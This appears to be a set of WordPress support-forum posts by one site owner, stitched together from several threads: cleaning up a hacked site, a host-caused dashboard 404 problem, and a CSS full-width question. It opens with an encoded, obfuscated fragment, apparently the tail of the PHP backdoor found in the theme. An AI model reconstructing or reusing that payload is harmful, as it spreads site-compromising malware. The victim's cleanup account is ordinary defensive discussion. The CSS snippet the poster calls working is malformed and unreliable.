QGVLiw/2TbqT3hEkca3eYc/U0ra4kykZ23ZYT1IQWoR1O/Z/mr3jHMAtCjwpTq8dfnaoulwtjPK8+MC9RLUGIusvo8ez1TYdAN5GhJLVBv1ZLJtNabVqe+VdHXFhnnPJyhLTqPYGJh77I0B8uqIFijUxu4VzXkLdbs/NxgP1vmuYMpsCH2NECKNY2ZM7tm/2ajyJ0yThTJ5CizWa3l9eoX1asv6mVIZHdVrV9YNcu4nPOvrmt/QV1/SDw93klj7d1/VhCRd81RdjNEsDUjW37cqk7H0y69lcoVnoZfxF3cEkK8KhAgyACBkYuhfUQqxnulcK+Y9AyDvY7w3EqFgeWaJT2OmxuBAE8XTDn6VVlcSw/jtuAyLWqH/GVIjrzTSFP+8yD1Xd5WpNXJDVCeZqNHcwbcuFfJIdVUBsS44sgAtE/c/gFe/sgP3LPKJEdc3LeMmmy1+o7vd9FNo4u5FoHikT2anvxf'\x29\x29\x29\x3B","\x2E");

It looks like some sort of ascill logo at the top, but I can’t make it out. Do hackers do that?

Hi Jackie,

Many thanks for your response. Here is what I have done so far (not necessarily in order):

Deleted the infected file that was in my theme’s Functions folder. I think it might have been a backdoor, not that I have any familiarity with such things, or with php, but there was stuff about passwords and cookies in it. I’ll post it, if someone can tell me how to do that safely.

Created a new admin account with a strong password, and deleted the one the hacker had changed back to “admin”

Changed the admin user login account from phpMyAdmin, after already changing it from the WordPress dashboard (my webhost was insistent on this)

Changed my Cpanel and FTP passwords

Had secure FTP implemented on on my account, and updated my login info in my FTP client

Changed the “secret passwords” in the wp-config files of all 3 of my WordPress installations.

Checked all my htaccess files (they matched the ones that are posted on www.remarpro.com)

Went through every directory of public html looking for files with the same dates as the infected file (this is how I discovered that I had a new GoogleAdsense plugin that I hadn’t installed).

Uninstalled GoogleAdsense plugin

Downloaded backups of my 3 databases (I had already backed up the rest of my site the day of the hack)

Searched the sql file of my top level domain for the 4 strings you mentioned. There were a none for the 2, 3rd & 4th strings. I did find a couple of scripts to run videos linked in the WordPress news section, but they appeared to link to legit URLs

However, this section near the beginning of the sql file looked a little weird (not that I’ve ever looked at my sql file before):

‘LOCK TABLES wp_comment_notifier WRITE;
/*!40000 ALTER TABLE wp_comment_notifier DISABLE KEYS */;
INSERT INTO wp_comment_notifier (id, post_id, name, email, token) VALUES —-then a bunch of email addresses with additional number codes and user names, about half of which had the same user name despite the different emails (this might be someone I blocked several years back before I learned other ways to manage comment spam). My site does not have users. These were alphabetical, but only went through D ——–
/*!40000 ALTER TABLE wp_comment_notifier ENABLE KEYS */;
UNLOCK TABLES;’

I have been in touch with my webhost for several days. Frankly, they couldn’t care less. They had already scanned my files and told me they were clean before I found the infected file. They continue to tell me everything’s fine, like I’d believe them after that!

When I asked why my raw logs were in Chinese, they said something vague about the scripts they were using. It wouldn’t surprise me at all if the infection came from the server. There have been intermittent service outages for several weeks. However, I admit my username and password weren’t as strong as they could’ve been.

The hacked theme file was in the top level domain. I also have an add-on domain, and the add-on domain has a sub domain. There were no files with the hack date in add-on and subdomain directories, and their htaccess files looked fine, but I changed the wp-config passwords anyway. Do I also have to change my login passwords for the other two domains?

Hi Chris,

Thanks for your response. I never received an email notification that you had replied, so I just discovered it.

After I uninstalled WPBackItUp, I installed a different backup plugin, and had exactly the same experience of my antivirus blocking the download of the theme backup file. I was eventually able to identify the infected file as an extra file in the Functions directory of my active theme that was masquerading as a real theme file. The hack also seems to have installed an ad plugin, although no ads are currently showing on my site.

I am now trying to determine what other cleanup I may need to do, and how I was hacked. The hack date is the same as the date I ran WPBackItUp (which I hadn’t done for several months), but the time is different by a good 10 hours, so that may just be a coincidence.

I did submit the infected zip file that triggered the AV alert to https://www.virustotal.com (I couldn’t figure out how to separate the infected file and upload it alone). Only two of the 56 search engines caught the infection, Avast, which identified it as PHP:Decode-DE [Trj] and ESET-NOD32 which identified it as PHP/Agent.NET.

No, I never heard back from them, or anyone else on the issue, so I had to move on to another theme.

I also had this problem – I could log into the Dashboard, but Dashboard/Updates, Appearance/Themes and Appearance/Customize, Plugins/Installed and Plugins/Add New returned a 404 not found error when clicked. The public site was fine, and everything else in the dashboard was also fine.

Fortunately, I found this thread before I wasted hours troubleshooting something that was actually a host problem. My host is also arvixe, and after I finally got a live person (which took half an hour and two phone calls), he knew immediately what the problem was. He said he noted out a script in the htaccess file. I thought I’d be able to see this when I looked at the file after the call, but I don’t see anything noted out, so I’m afraid I can’t give more details than that. Hopefully this will be useful to others with the same problem.

Don’t know if it’s relevant, but this occurred in an add-on domain, and the top-level domain (which has its own separate htaccess file) was not affected. The affected site had automatically updated to WP 4.3 recently, but I don’t know whether that is related or coincidental.

The code above didn’t work. The nested brackets and parentheses didn’t look quite right to me, so I tried this:

@media {min-width: 1200px}

.container {
width: 100%;
}

That achieved the result I was looking for, and that you kindly demonstrated in your first screenshot.

Thanks also for the screenshot of how to find the gallery code. I have firebug, but my coding skills are limited, so I’m not always sure what to do with code once I find it. I’ll check with the Simple Lightbox author for guidance on the gallery margins.

Many thanks for your time on this!

Hi Bojan,

Sorry I omitted that. Here’s the link:

https://test-site.wp-tutor.me/test-gallery

The page template is set to Full Width.

I am using the same background inside and outside of the container (blinking stars) so the container won’t be visible, but I changed the container background back to the default for the purposes of this discussion. What I am looking for is to extend the container all the way to the edges of the view screen, so that none of the site background would be showing in default zoom.

I’m also wondering if there’s a way to reduce the padding between the Gallery and the edge of the container so the Gallery uses more of the container width, or is that being controlled by the Gallery code?